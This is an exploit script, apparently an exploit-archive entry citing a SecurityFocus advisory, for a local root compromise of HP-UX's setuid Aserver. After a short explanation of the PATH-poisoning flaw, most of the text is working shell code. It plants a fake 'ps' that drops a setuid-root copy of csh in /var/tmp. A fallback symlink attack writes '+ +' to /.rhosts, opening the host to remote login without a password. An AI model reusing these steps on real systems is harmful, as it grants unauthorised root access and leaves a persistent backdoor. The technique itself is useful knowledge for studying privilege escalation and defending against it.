33 lines
No EOL
1.2 KiB
Bash
Executable file
# source: https://www.securityfocus.com/bid/1929/info
#
# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default.
#
# During normal execution, Aserver executes "ps" via the system() library call, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root.
#
# This is a trivial root compromise.
#

#!/bin/sh
#
# HP-UX aserver.sh - Loneguard 18/10/98
# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
#
cd /var/tmp
cat << _EOF > ps
#!/bin/sh
cp /bin/csh /var/tmp/.foosh
chmod 4755 /var/tmp/.foosh
_EOF
chmod 755 ps
PATH=.:$PATH
/opt/audio/bin/Aserver -f
if [ -e /var/tmp/.foosh ]
then
# Hmmm, you not like that technique?
cd /tmp
rm last_uuid
ln -s /.rhosts last_uuid
/opt/audio/bin/Aserver -f
echo "+ +" > /.rhosts
# Haha, my Kungfu is the best!
fi
echo Crazy MONKEY!